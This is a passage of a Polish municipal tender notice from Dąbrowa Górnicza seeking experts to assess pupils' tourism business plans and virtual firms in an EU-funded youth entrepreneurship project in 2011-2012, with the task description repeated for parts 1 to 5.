7.6. Cena musi uwzględniać wszystkie wymagania SIWZ oraz obejmować wszelkie koszty, jakie poniesie Wykonawca z tytułu należytej oraz zgodnej z obowiązującymi przepisami realizacji przedmiotu zamówienia, ,w tym koszty składek ubezpieczenia społecznego i ubezpieczenia zdrowotnego, podatek VAT - o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
7.7.. Podana w ofercie cena musi być wyrażona w PLN, z dokładnością do dwóch miejsc po przecinku z zastosowaniem przybliżenia dziesiętnego. Cena musi zawierać należny podatek VAT. 
7.8. Cena za wykonanie przedmiotu umowy obejmuje wszystkie obowiązki Wykonawcy w trakcie realizacji przedmiotu zamówienia, nie podlega negocjacjom. 
7.9. W ofercie należy podać cenę brutto za przedmiot zamówienia opisany w SIWZ. Ceną oferty jest iloczyn ceny brutto za sporządzenie 1 analizy wirtualnej firmy i przyjętej ilości analiz tj. 25 szt.8. dot. sekcji IV.4.4. Zamawiający przewiduje udzielenie  zamówienia częściowego na zadanie nr 1 - 5 i (-lub) zadanie nr 6 - 8. Wykonawca może złożyć ofertę na zadanie nr 1 -5 i (-lub) zadanie nr 6 - 8. 
Każdy Wykonawca może złożyć tylko jedną ofertę na jedno zadanie od 1 do 5 i (-lub) jedną ofertę na jedno zadanie od 6 do 8.
Złożenie przez Wykonawcę ofert na więcej niż jedno zadanie od 1 do  5 i (lub) na więcej niż jedno zadanie od 6 do 8 skutkować będzie odrzuceniem wszystkich ofert częściowych złożonych przez Wykonawcę..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługi eksperckie polegające na ocenie 
biznes planów oraz analizie działania  wirtualnych firm w ramach projektu Liderzy młodej przedsiębiorczości
Zadanie nr 1: Ocena biznes planów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi eksperckie w zakresie oceny biznes planów 
stworzonych przez uczniów w branży turystycznej (zadania nr 1 - 5), a także usługi polegające na ocenie działalności wirtualnych firm  stworzonych na bazie 5 wyłonionych biznes planów (zadania nr 6-8). 
Zamówienia udziela się w ramach projektu Liderzy młodej przedsiębiorczości, realizowanego przez Gminę Dąbrowa Górnicza od 1.06.2011 r. do 31.05.2012 r. 
w partnerstwie z Liderem - Fundacją Regionalnej Agencji Promocji Zatrudnienia 
w Dąbrowie Górniczej oraz Związkiem Gmin Jurajskich. Projekt dofinansowany jest 
ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu II Rozwój Zasobów Ludzkich i potencjału administracyjnego przedsiębiorstw oraz poprawa stanu zdrowia osób pracujących, Działanie 2.2 Wsparcie dla systemu adaptacyjności kadr. 
Poddziałanie 2.2.1 Poprawa jakości usług świadczonych przez instytucje wspierające rozwój przedsiębiorczości i innowacyjności.
Celem projektu jest promowanie przedsiębiorczości w obszarze sektorów turystyki wśród uczniów szkół ponadgimnazjalnych z terenu gmin Jury Krakowsko - Częstochowskiej poprzez edukację w zakresie podejmowania i prowadzenia działalności gospodarczej. 
Jednym z zadań, za które odpowiedzialna jest Gmina Dąbrowa Górnicza, jest przeprowadzenie oceny biznes planów sporządzonych przez kilkuosobowe grupy uczniów. Zostanie do tego zaangażowana komisja składająca się z 5 ekspertów. Ocena biznes planów odbędzie w ramach konkursu organizowanego przez Lidera, który ma odbyć się w marcu 2012 r. (zadanie nr 1 - 5).
Do kolejnego etapu, jakim jest ocena i analiza działań podejmowanych przez wirtualne firmy zostanie zaangażowanych 3 ekspertów. Drugi etap przewidziany jest w okresie od drugiej połowy marca do połowy maja 2012 r. (zadanie nr 6 - 8).
Zadania ekspertów i przebieg prac komisji ds. oceny biznes planów (dot. zadań nr 1-5):
- merytoryczna ocena maksimum 21 biznes planów z sektora turystyki,
- współudział w komisji oceniającej biznes plany, 
- wypełnianie kart oceny z prezentacji poszczególnych biznes planów,
- bieżąca współpraca z Liderem i Zamawiającym,
- bieżące informowanie Zamawiającego o zaistniałych problemach,
- sporządzanie wszystkich wymaganych dokumentów i informacji, w tym protokołu
z posiedzeń komisji w dniach wykonywania usługi,
- prowadzenie ewidencji czasu pracy oraz rozliczanie wykonanych zadań    według zestawienia stanowiącego załącznik nr 1 do umowy,
- kryteria oceny: możliwość realizacji projektu (biznesu), uzasadnione potrzeby projektu (biznesu), wykazanie się przedsiębiorczością, rzetelność przeprowadzonej analizy rynku, innowacyjność, sposób prezentacji przed komisją, logika układu prezentacji, płynność 
i tempo prezentacji, umiejętność obrony własnych poglądów, odpowiedzi na pytania dodatkowe, umiejętność pracy w zespole
- przewidziany czas trwania każdej prezentacji: od 20 do 40 minut,
- forma prezentacji: multimedialna lub inna pozwalająca na zobrazowanie biznes planu, tj. makieta, plansze, itp. 
- przewidziana ilość godzin pracy dla każdego eksperta - maksymalnie 20 godzin w ciągu dwóch dni od dnia zawarcia umowy do  31.03.2012 r. 
  O dokładnym terminie świadczenia usługi Wykonawca zostanie poinformowany przez   Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu   informacji od Lidera projektu, nie później niż 1 dzień przed terminem wykonania usługi,
- miejsce wykonywania usługi: o wyborze miejsca decyduje ilościowa przewaga biznes   planów z poszczególnych miast leżących na terenie Jury Krakowsko -   Częstochowskiej. Określenie miejsca będzie możliwe po zakończeniu naboru biznes   planów, tj. po 2 marca 2012 r. O dokładnym miejscu świadczenia usługi Wykonawca   zostanie  poinformowany indywidualnie przez Zamawiającego drogą elektroniczną lub   pisemnie min. 1 dzień przed rozpoczęciem usługi.
Wykonawca składa oświadczenie według załącznika nr 2 do umowy dotyczącego zaangażowania w innych projektach w celu wykluczenia podwójnego finansowania i zweryfikowania dyspozycyjności czasowej do wykonania zobowiązań wynikających z wszystkich projektów i jest zobowiązany do aktualizowania oświadczenia w przypadku wystąpienia zmian.
 




Wykonawca ponosi wszystkie koszty związane z wykonywaniem zlecenia poza siedzibą Zamawiającego, w szczególności koszty dojazdu, rozmów telefonicznych, zużycia materiałów biurowych, podstawowego sprzętu biurowego itp., a także koszty składek ubezpieczenia społecznego i 
Ubezpieczenia zdrowotnego, podatek VAT -  o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
Wykonawca może złożyć tylko 1 ofertę z zakresu zadań od 1 do 5. Wykonawca, który złożył ofertę na zadanie z zakresu 1 do 5, może złożyć jedną ofertę na zadania 
z zakresu 6 do 8. 
Wykonawca zobowiązuje się wykonać przedmiot umowy przy udziale wskazanego 
w ofercie Eksperta. Ewentualna zmiana osoby pełniącej funkcję eksperta może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osobę 
o kwalifikacjach i doświadczeniu nie niższym od określonych w Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.21.21.10-7, 79.41.00.00-1, 79.41.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi eksperckie polegające na ocenie 
biznes planów oraz analizie działania wirtualnych firm w ramach projektu Liderzy młodej przedsiębiorczości
Zadanie nr 2: Ocena biznes planów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi eksperckie w zakresie oceny biznes planów 
stworzonych przez uczniów w branży turystycznej (zadania nr 1 - 5), a także usługi polegające na ocenie działalności wirtualnych firm  stworzonych na bazie 5 wyłonionych biznes planów (zadania nr 6-8). 
Zamówienia udziela się w ramach projektu Liderzy młodej przedsiębiorczości realizowanego przez Gminę Dąbrowa Górnicza od 1.06.2011 r. do 31.05.2012 r. 
w partnerstwie z Liderem - Fundacją Regionalnej Agencji Promocji Zatrudnienia 
w Dąbrowie Górniczej oraz Związkiem Gmin Jurajskich. Projekt dofinansowany jest 
ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu II Rozwój Zasobów Ludzkich i potencjału administracyjnego przedsiębiorstw oraz poprawa stanu zdrowia osób pracujących, Działanie 2.2 Wsparcie dla systemu adaptacyjności kadr. 
Poddziałanie 2.2.1 Poprawa jakości usług świadczonych przez instytucje wspierające rozwój przedsiębiorczości i innowacyjności.
Celem projektu jest promowanie przedsiębiorczości w obszarze sektorów turystyki wśród uczniów szkół ponadgimnazjalnych z terenu gmin Jury Krakowsko - Częstochowskiej poprzez edukację w zakresie podejmowania i prowadzenia działalności gospodarczej. 
Jednym z zadań, za które odpowiedzialna jest Gmina Dąbrowa Górnicza, jest przeprowadzenie oceny biznes planów sporządzonych przez kilkuosobowe grupy uczniów. Zostanie do tego zaangażowana komisja składająca się z 5 ekspertów. Ocena biznes planów odbędzie w ramach konkursu organizowanego przez Lidera, który ma odbyć się w marcu 2012 r. (zadanie nr 1 - 5).
Do kolejnego etapu, jakim jest ocena i analiza działań podejmowanych przez wirtualne firmy zostanie zaangażowanych 3 ekspertów. Drugi etap przewidziany jest w okresie od drugiej połowy marca do połowy maja 2012 r. (zadanie nr 6 - 8).
Zadania ekspertów i przebieg prac komisji ds. oceny biznes planów (dot. zadań nr 1-5):
- merytoryczna ocena maksimum 21 biznes planów z sektora turystyki,
- współudział w komisji oceniającej biznes plany, 
- wypełnianie kart oceny z prezentacji poszczególnych biznes planów,
- bieżąca współpraca z Liderem i Zamawiającym,
- bieżące informowanie Zamawiającego o zaistniałych problemach,
- sporządzanie wszystkich wymaganych dokumentów i informacji, w tym protokołu
z posiedzeń komisji w dniach wykonywania usługi,
- prowadzenie ewidencji czasu pracy oraz rozliczanie wykonanych zadań    według zestawienia stanowiącego załącznik nr 1 do umowy,
- kryteria oceny: możliwość realizacji projektu (biznesu), uzasadnione potrzeby projektu (biznesu), wykazanie się przedsiębiorczością, rzetelność przeprowadzonej analizy rynku, innowacyjność, sposób prezentacji przed komisją, logika układu prezentacji, płynność 
i tempo prezentacji, umiejętność obrony własnych poglądów, odpowiedzi na pytania dodatkowe, umiejętność pracy w zespole
- przewidziany czas trwania każdej prezentacji: od 20 do 40 minut,
- forma prezentacji: multimedialna lub inna pozwalająca na zobrazowanie biznes planu, tj. makieta, plansze, itp. 
- przewidziana ilość godzin pracy dla każdego eksperta - maksymalnie 20 godzin w ciągu dwóch dni od dnia zawarcia umowy do  31.03.2012 r. 
  O dokładnym terminie świadczenia usługi Wykonawca zostanie poinformowany przez   Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu   informacji od Lidera projektu, nie później niż 1 dzień przed terminem wykonania usługi,
- miejsce wykonywania usługi: o wyborze miejsca decyduje ilościowa przewaga biznes   planów z poszczególnych miast leżących na terenie Jury Krakowsko -   Częstochowskiej. Określenie miejsca będzie możliwe po zakończeniu naboru biznes   planów, tj. po 2 marca 2012 r. O dokładnym miejscu świadczenia usługi Wykonawca   zostanie  poinformowany indywidualnie przez Zamawiającego drogą elektroniczną lub   pisemnie min. 1 dzień przed rozpoczęciem usługi.
Wykonawca składa oświadczenie według załącznika nr 2 do umowy dotyczącego zaangażowania w innych projektach w celu wykluczenia podwójnego finansowania i zweryfikowania dyspozycyjności czasowej do wykonania zobowiązań wynikających z wszystkich projektów i jest zobowiązany do aktualizowania oświadczenia w przypadku wystąpienia zmian.
Wykonawca ponosi wszystkie koszty związane z wykonywaniem zlecenia poza siedzibą Zamawiającego, w szczególności koszty dojazdu, rozmów telefonicznych, zużycia materiałów biurowych, podstawowego sprzętu biurowego itp., a także koszty składek ubezpieczenia społecznego i 
Ubezpieczenia zdrowotnego, podatek VAT -  o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
Wykonawca może złożyć tylko 1 ofertę z zakresu zadań od 1 do 5. Wykonawca, który złożył ofertę na zadanie z zakresu 1 do 5, może złożyć jedną ofertę na zadania 
z zakresu 6 do 8. 
Wykonawca zobowiązuje się wykonać przedmiot umowy przy udziale wskazanego 
w ofercie Eksperta. Ewentualna zmiana osoby pełniącej funkcję eksperta może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osobę 
o kwalifikacjach i doświadczeniu nie niższym od określonych w Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.21.21.10-7, 79.41.00.00-1, 79.41.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługi eksperckie polegające na ocenie 
biznes planów oraz analizie działania wirtualnych firm w ramach projektu  Liderzy młodej przedsiębiorczości
Zadanie nr 3: Ocena biznes planów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi eksperckie w zakresie oceny biznes planów 
stworzonych przez uczniów w branży turystycznej (zadania nr 1 - 5), a także usługi polegające na ocenie działalności wirtualnych firm  stworzonych na bazie 5 wyłonionych biznes planów (zadania nr 6-8). 
Zamówienia udziela się w ramach projektu Liderzy młodej przedsiębiorczości realizowanego przez Gminę Dąbrowa Górnicza od 1.06.2011 r. do 31.05.2012 r. 
w partnerstwie z Liderem - Fundacją Regionalnej Agencji Promocji Zatrudnienia 
w Dąbrowie Górniczej oraz Związkiem Gmin Jurajskich. Projekt dofinansowany jest 
ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu II Rozwój Zasobów Ludzkich i potencjału administracyjnego przedsiębiorstw oraz poprawa stanu zdrowia osób pracujących, Działanie 2.2 Wsparcie dla systemu adaptacyjności kadr. 
Poddziałanie 2.2.1 Poprawa jakości usług świadczonych przez instytucje wspierające rozwój przedsiębiorczości i innowacyjności.
Celem projektu jest promowanie przedsiębiorczości w obszarze sektorów turystyki wśród uczniów szkół ponadgimnazjalnych z terenu gmin Jury Krakowsko - Częstochowskiej poprzez edukację w zakresie podejmowania i prowadzenia działalności gospodarczej. 
Jednym z zadań, za które odpowiedzialna jest Gmina Dąbrowa Górnicza, jest przeprowadzenie oceny biznes planów sporządzonych przez kilkuosobowe grupy uczniów. Zostanie do tego zaangażowana komisja składająca się z 5 ekspertów. Ocena biznes planów odbędzie w ramach konkursu organizowanego przez Lidera, który ma odbyć się w marcu 2012 r. (zadanie nr 1 - 5).
Do kolejnego etapu, jakim jest ocena i analiza działań podejmowanych przez wirtualne firmy zostanie zaangażowanych 3 ekspertów. Drugi etap przewidziany jest w okresie od drugiej połowy marca do połowy maja 2012 r. (zadanie nr 6 - 8).
Zadania ekspertów i przebieg prac komisji ds. oceny biznes planów (dot. zadań nr 1-5):
- merytoryczna ocena maksimum 21 biznes planów z sektora turystyki,
- współudział w komisji oceniającej biznes plany, 
- wypełnianie kart oceny z prezentacji poszczególnych biznes planów,
- bieżąca współpraca z Liderem i Zamawiającym,
- bieżące informowanie Zamawiającego o zaistniałych problemach,
- sporządzanie wszystkich wymaganych dokumentów i informacji, w tym protokołu
z posiedzeń komisji w dniach wykonywania usługi,
- prowadzenie ewidencji czasu pracy oraz rozliczanie wykonanych zadań    według zestawienia stanowiącego załącznik nr 1 do umowy,
- kryteria oceny: możliwość realizacji projektu (biznesu), uzasadnione potrzeby projektu (biznesu), wykazanie się przedsiębiorczością, rzetelność przeprowadzonej analizy rynku, innowacyjność, sposób prezentacji przed komisją, logika układu prezentacji, płynność 
i tempo prezentacji, umiejętność obrony własnych poglądów, odpowiedzi na pytania dodatkowe, umiejętność pracy w zespole
- przewidziany czas trwania każdej prezentacji: od 20 do 40 minut,
- forma prezentacji: multimedialna lub inna pozwalająca na zobrazowanie biznes planu, tj. makieta, plansze, itp. 
- przewidziana ilość godzin pracy dla każdego eksperta - maksymalnie 20 godzin w ciągu dwóch dni od dnia zawarcia umowy do  31.03.2012 r. 
  O dokładnym terminie świadczenia usługi Wykonawca zostanie poinformowany przez   Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu   informacji od Lidera projektu, nie później niż 1 dzień przed terminem wykonania usługi,
- miejsce wykonywania usługi: o wyborze miejsca decyduje ilościowa przewaga biznes   planów z poszczególnych miast leżących na terenie Jury Krakowsko -   Częstochowskiej. Określenie miejsca będzie możliwe po zakończeniu naboru biznes   planów, tj. po 2 marca 2012 r. O dokładnym miejscu świadczenia usługi Wykonawca   zostanie  poinformowany indywidualnie przez Zamawiającego drogą elektroniczną lub   pisemnie min. 1 dzień przed rozpoczęciem usługi.
Wykonawca składa oświadczenie według załącznika nr 2 do umowy dotyczącego zaangażowania w innych projektach w celu wykluczenia podwójnego finansowania i zweryfikowania dyspozycyjności czasowej do wykonania zobowiązań wynikających z wszystkich projektów i jest zobowiązany do aktualizowania oświadczenia w przypadku wystąpienia zmian.
Wykonawca ponosi wszystkie koszty związane z wykonywaniem zlecenia poza siedzibą Zamawiającego, w szczególności koszty dojazdu, rozmów telefonicznych, zużycia materiałów biurowych, podstawowego sprzętu biurowego itp., a także koszty składek ubezpieczenia społecznego i 
Ubezpieczenia zdrowotnego, podatek VAT -  o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
Wykonawca może złożyć tylko 1 ofertę z zakresu zadań od 1 do 5. Wykonawca, który złożył ofertę na zadanie z zakresu 1 do 5, może złożyć jedną ofertę na zadania 
z zakresu 6 do 8. 
Wykonawca zobowiązuje się wykonać przedmiot umowy przy udziale wskazanego 
w ofercie Eksperta. Ewentualna zmiana osoby pełniącej funkcję eksperta może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osobę 
o kwalifikacjach i doświadczeniu nie niższym od określonych w Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.21.21.10-7, 79.41.00.00-1, 79.41.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Usługi eksperckie polegające na ocenie 
biznes planów oraz analizie działania wirtualnych firm w ramach projektu  Liderzy młodej przedsiębiorczości
Zadanie nr 4: Ocena biznes planów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi eksperckie w zakresie oceny biznes planów 
stworzonych przez uczniów w branży turystycznej (zadania nr 1 - 5), a także usługi polegające na ocenie działalności wirtualnych firm  stworzonych na bazie 5 wyłonionych biznes planów (zadania nr 6-8). 
Zamówienia udziela się w ramach projektu Liderzy młodej przedsiębiorczości realizowanego przez Gminę Dąbrowa Górnicza od 1.06.2011 r. do 31.05.2012 r. 
w partnerstwie z Liderem - Fundacją Regionalnej Agencji Promocji Zatrudnienia 
w Dąbrowie Górniczej oraz Związkiem Gmin Jurajskich. Projekt dofinansowany jest 
ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu II Rozwój Zasobów Ludzkich i potencjału administracyjnego przedsiębiorstw oraz poprawa stanu zdrowia osób pracujących, Działanie 2.2 Wsparcie dla systemu adaptacyjności kadr. 
Poddziałanie 2.2.1 Poprawa jakości usług świadczonych przez instytucje wspierające rozwój przedsiębiorczości i innowacyjności.
Celem projektu jest promowanie przedsiębiorczości w obszarze sektorów turystyki wśród uczniów szkół ponadgimnazjalnych z terenu gmin Jury Krakowsko - Częstochowskiej poprzez edukację w zakresie podejmowania i prowadzenia działalności gospodarczej. 
Jednym z zadań, za które odpowiedzialna jest Gmina Dąbrowa Górnicza, jest przeprowadzenie oceny biznes planów sporządzonych przez kilkuosobowe grupy uczniów. Zostanie do tego zaangażowana komisja składająca się z 5 ekspertów. Ocena biznes planów odbędzie w ramach konkursu organizowanego przez Lidera, który ma odbyć się w marcu 2012 r. (zadanie nr 1 - 5).
Do kolejnego etapu, jakim jest ocena i analiza działań podejmowanych przez wirtualne firmy zostanie zaangażowanych 3 ekspertów. Drugi etap przewidziany jest w okresie od drugiej połowy marca do połowy maja 2012 r. (zadanie nr 6 - 8).
Zadania ekspertów i przebieg prac komisji ds. oceny biznes planów (dot. zadań nr 1-5):
- merytoryczna ocena maksimum 21 biznes planów z sektora turystyki,
- współudział w komisji oceniającej biznes plany, 
- wypełnianie kart oceny z prezentacji poszczególnych biznes planów,
- bieżąca współpraca z Liderem i Zamawiającym,
- bieżące informowanie Zamawiającego o zaistniałych problemach,
- sporządzanie wszystkich wymaganych dokumentów i informacji, w tym protokołu
z posiedzeń komisji w dniach wykonywania usługi,
- prowadzenie ewidencji czasu pracy oraz rozliczanie wykonanych zadań    według zestawienia stanowiącego załącznik nr 1 do umowy,
- kryteria oceny: możliwość realizacji projektu (biznesu), uzasadnione potrzeby projektu (biznesu), wykazanie się przedsiębiorczością, rzetelność przeprowadzonej analizy rynku, innowacyjność, sposób prezentacji przed komisją, logika układu prezentacji, płynność 
i tempo prezentacji, umiejętność obrony własnych poglądów, odpowiedzi na pytania dodatkowe, umiejętność pracy w zespole
- przewidziany czas trwania każdej prezentacji: od 20 do 40 minut,
- forma prezentacji: multimedialna lub inna pozwalająca na zobrazowanie biznes planu, tj. makieta, plansze, itp. 
- przewidziana ilość godzin pracy dla każdego eksperta - maksymalnie 20 godzin w ciągu dwóch dni od dnia zawarcia umowy do  31.03.2012 r. 
  O dokładnym terminie świadczenia usługi Wykonawca zostanie poinformowany przez   Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu   informacji od Lidera projektu, nie później niż 1 dzień przed terminem wykonania usługi,
- miejsce wykonywania usługi: o wyborze miejsca decyduje ilościowa przewaga biznes   planów z poszczególnych miast leżących na terenie Jury Krakowsko -   Częstochowskiej. Określenie miejsca będzie możliwe po zakończeniu naboru biznes   planów, tj. po 2 marca 2012 r. O dokładnym miejscu świadczenia usługi Wykonawca   zostanie  poinformowany indywidualnie przez Zamawiającego drogą elektroniczną lub   pisemnie min. 1 dzień przed rozpoczęciem usługi.
Wykonawca składa oświadczenie według załącznika nr 2 do umowy dotyczącego zaangażowania w innych projektach w celu wykluczenia podwójnego finansowania i zweryfikowania dyspozycyjności czasowej do wykonania zobowiązań wynikających z wszystkich projektów i jest zobowiązany do aktualizowania oświadczenia w przypadku wystąpienia zmian.
Wykonawca ponosi wszystkie koszty związane z wykonywaniem zlecenia poza siedzibą Zamawiającego, w szczególności koszty dojazdu, rozmów telefonicznych, zużycia materiałów biurowych, podstawowego sprzętu biurowego itp., a także koszty składek ubezpieczenia społecznego i 
Ubezpieczenia zdrowotnego, podatek VAT -  o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
Wykonawca może złożyć tylko 1 ofertę z zakresu zadań od 1 do 5. Wykonawca, który złożył ofertę na zadanie z zakresu 1 do 5, może złożyć jedną ofertę na zadania 
z zakresu 6 do 8. 
Wykonawca zobowiązuje się wykonać przedmiot umowy przy udziale wskazanego 
w ofercie Eksperta. Ewentualna zmiana osoby pełniącej funkcję eksperta może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osobę 
o kwalifikacjach i doświadczeniu nie niższym od określonych w Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.21.21.10-7, 79.41.00.00-1, 79.41.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usługi eksperckie polegające na ocenie 
biznes planów oraz analizie działania wirtualnych firm w ramach projektu  Liderzy młodej przedsiębiorczości
Zadanie nr 5: Ocena biznes planów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi eksperckie w zakresie oceny biznes planów 
stworzonych przez uczniów w branży turystycznej (zadania nr 1 - 5), a także usługi polegające na ocenie działalności wirtualnych firm  stworzonych na bazie 5 wyłonionych biznes planów (zadania nr 6-8). 
Zamówienia udziela się w ramach projektu Liderzy młodej przedsiębiorczości realizowanego przez Gminę Dąbrowa Górnicza od 1.06.2011 r. do 31.05.2012 r. 
w partnerstwie z Liderem - Fundacją Regionalnej Agencji Promocji Zatrudnienia 
w Dąbrowie Górniczej oraz Związkiem Gmin Jurajskich. Projekt dofinansowany jest 
ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu II Rozwój Zasobów Ludzkich i potencjału administracyjnego przedsiębiorstw oraz poprawa stanu zdrowia osób pracujących, Działanie 2.2 Wsparcie dla systemu adaptacyjności kadr. 
Poddziałanie 2.2.1 Poprawa jakości usług świadczonych przez instytucje wspierające rozwój przedsiębiorczości i innowacyjności.
Celem projektu jest promowanie przedsiębiorczości w obszarze sektorów turystyki wśród uczniów szkół ponadgimnazjalnych z terenu gmin Jury Krakowsko - Częstochowskiej poprzez edukację w zakresie podejmowania i prowadzenia działalności gospodarczej. 
Jednym z zadań, za które odpowiedzialna jest Gmina Dąbrowa Górnicza, jest przeprowadzenie oceny biznes planów sporządzonych przez kilkuosobowe grupy uczniów. Zostanie do tego zaangażowana komisja składająca się z 5 ekspertów. Ocena biznes planów odbędzie w ramach konkursu organizowanego przez Lidera, który ma odbyć się w marcu 2012 r. (zadanie nr 1 - 5).
Do kolejnego etapu, jakim jest ocena i analiza działań podejmowanych przez wirtualne firmy zostanie zaangażowanych 3 ekspertów. Drugi etap przewidziany jest w okresie od drugiej połowy marca do połowy maja 2012 r. (zadanie nr 6 - 8).
Zadania ekspertów i przebieg prac komisji ds. oceny biznes planów (dot. zadań nr 1-5):
- merytoryczna ocena maksimum 21 biznes planów z sektora turystyki,
- współudział w komisji oceniającej biznes plany, 
- wypełnianie kart oceny z prezentacji poszczególnych biznes planów,
- bieżąca współpraca z Liderem i Zamawiającym,
- bieżące informowanie Zamawiającego o zaistniałych problemach,
- sporządzanie wszystkich wymaganych dokumentów i informacji, w tym protokołu
z posiedzeń komisji w dniach wykonywania usługi,
- prowadzenie ewidencji czasu pracy oraz rozliczanie wykonanych zadań    według zestawienia stanowiącego załącznik nr 1 do umowy,
- kryteria oceny: możliwość realizacji projektu (biznesu), uzasadnione potrzeby projektu (biznesu), wykazanie się przedsiębiorczością, rzetelność przeprowadzonej analizy rynku, innowacyjność, sposób prezentacji przed komisją, logika układu prezentacji, płynność 
i tempo prezentacji, umiejętność obrony własnych poglądów, odpowiedzi na pytania dodatkowe, umiejętność pracy w zespole
- przewidziany czas trwania każdej prezentacji: od 20 do 40 minut,
- forma prezentacji: multimedialna lub inna pozwalająca na zobrazowanie biznes planu, tj. makieta, plansze, itp. 
- przewidziana ilość godzin pracy dla każdego eksperta - maksymalnie 20 godzin w ciągu dwóch dni od dnia zawarcia umowy do  31.03.2012 r. 
  O dokładnym terminie świadczenia usługi Wykonawca zostanie poinformowany przez   Zamawiającego drogą elektroniczną lub pisemnie niezwłocznie po uzyskaniu   informacji od Lidera projektu, nie później niż 1 dzień przed terminem wykonania usługi,
- miejsce wykonywania usługi: o wyborze miejsca decyduje ilościowa przewaga biznes   planów z poszczególnych miast leżących na terenie Jury Krakowsko -   Częstochowskiej. Określenie miejsca będzie możliwe po zakończeniu naboru biznes   planów, tj. po 2 marca 2012 r. O dokładnym miejscu świadczenia usługi Wykonawca   zostanie  poinformowany indywidualnie przez Zamawiającego drogą elektroniczną lub   pisemnie min. 1 dzień przed rozpoczęciem usługi.
Wykonawca składa oświadczenie według załącznika nr 2 do umowy dotyczącego zaangażowania w innych projektach w celu wykluczenia podwójnego finansowania i zweryfikowania dyspozycyjności czasowej do wykonania zobowiązań wynikających z wszystkich projektów i jest zobowiązany do aktualizowania oświadczenia w przypadku wystąpienia zmian.
Wykonawca ponosi wszystkie koszty związane z wykonywaniem zlecenia poza siedzibą Zamawiającego, w szczególności koszty dojazdu, rozmów telefonicznych, zużycia materiałów biurowych, podstawowego sprzętu biurowego itp., a także koszty składek ubezpieczenia społecznego i 
Ubezpieczenia zdrowotnego, podatek VAT -  o ile zachodzi prawny obowiązek potrącenia składek w tym zakresie lub podatku VAT.
Wykonawca może złożyć tylko 1 ofertę z zakresu zadań od 1 do 5. Wykonawca, który złożył ofertę na zadanie z zakresu 1 do 5, może złożyć jedną ofertę na zadania 
z zakresu 6 do 8. 
Wykonawca zobowiązuje się wykonać przedmiot umowy przy udziale wskazanego 
w ofercie Eksperta. Ewentualna zmiana osoby pełniącej funkcję eksperta może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osobę 
o kwalifikacjach i doświadczeniu nie niższym od określonych w Specyfikacji Istotnych Warunków Zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.22.10.00-0, 79.21.21.10-7, 79.41.00.00-1, 79.41.11.00-9.</p></li>
